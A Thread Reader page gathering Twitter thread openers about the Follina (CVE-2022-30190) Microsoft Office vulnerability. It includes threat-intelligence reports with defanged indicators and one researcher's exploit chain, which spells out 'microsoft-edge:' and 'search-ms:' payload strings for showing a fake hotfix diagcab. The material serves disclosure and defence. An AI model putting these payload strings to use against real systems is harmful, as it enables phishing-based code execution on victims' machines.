Discover and read the best of Twitter Threads about #Follina

Most recents (5)

Recorded Future analysts monitor targeting of ethnic and religious minorities by Chinese state-sponsored groups. In the first half of 2022, #TA413 exploited zero-days #Follina and CVE-2022-1040 with new custom backdoor #LOWZERO in Tibetan targeting. 1/9 bit.ly/3LwzoDf
#MalDoc lures, in Tibetan language, pose as applications for compensation, contest... This one sent from tibet[.]bet was weaponized with #RoyalRoad SHA 028e07fa88736f405d24f0d465bc789c3bcbbc9278effb3b1b73653847e86cf8, drops #LOWZERO and contacts hardcoded C2 45.77.19[.]75. 2/9 Image
Sent from the same domain, this lure has #phishing email links to tibet-gov.web[.]app posing as the Tibetan government-in-exile. Sent in 2 waves, the 1st email links to .docx attachment hosted on Google Firebase which attempts #Follina via the ms-msdt MSProtocol URI scheme. 3/9 Image
Read 9 tweets
microsoft-edge + ms-search + MSDT path traversal 0day = fun of 2-clicks (one click additional due to Protected View if docx is coming from remote btw).
This is the full chain:

1) Open a docx which connects to a remote server to download a diagcab file by MS Edge. This uses the protocol handler "microsoft-edge". So easy as this: "microsoft-edge:http://127.0.0.1:8081/foo.html"

2) Use "ms-search" trick to open folder Downloads.
Note i don't know username but i'm using what MS calls "Constants for Common Folders": location:shell%3aDownloads.

Full payload is: "search-ms:query=KB5002076-hotfix.diagcab&crumb=location:shell%3aDownloads&displayname=Important%20update"

Source: docs.microsoft.com/en-us/windows/…
Read 6 tweets
Proofpoint blocked a suspected state aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.
This campaign masqueraded as a salary increase and utilized an RTF (242d2fa02535599dae793e731b6db5a2) with the exploit payload downloaded from 45.76.53[.]253. Image
The downloaded Powershell script was base64 encoded and used Invoke-Expression to download an additional PS script (dbd2b7048b3321c87a768ed7581581db) from seller-notification[.]live.
Read 5 tweets
🚨 CRITICAL ALERT

A severe 0-day vulnerability called #Follina has been exposed (since May 27th) in MS Word Documents.

It could allow hackers to take full control of your computer, in some cases WITHOUT even opening the file. 🧵
1/ This exploit is a mountain of exploits stacked on top of eachother. However, it is unfortunately easy to re-create and cannot be detected by anti-virus. Strap in as we try to explain.
2/ The 0-day starts with a feature in MS Word called Templates.

This feature allows Word to load and execute HTML and JS from external sources.

Sound concerning? Don’t worry it gets way worse.
Read 19 tweets
Permitidme que siga algo potencialmente obvio y que quizás "todiós" sabe sobre #Follina, Word es solamente uno de los posibles vectores de ejecución. Una "tontería" en Python como

os.system(decode_this(payload))*

También lo ejecuta, un JS en una web, también...
*el método "decode_this" decodifica una cadena en base64, un añadido que he probado, nada más.
siendo, payload, la variable que contiene el string, que contiene la "magia" de la ejecución de "solución de problemas" para Windows que, a su vez, ejecuta X
Read 4 tweets

Related hashtags

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!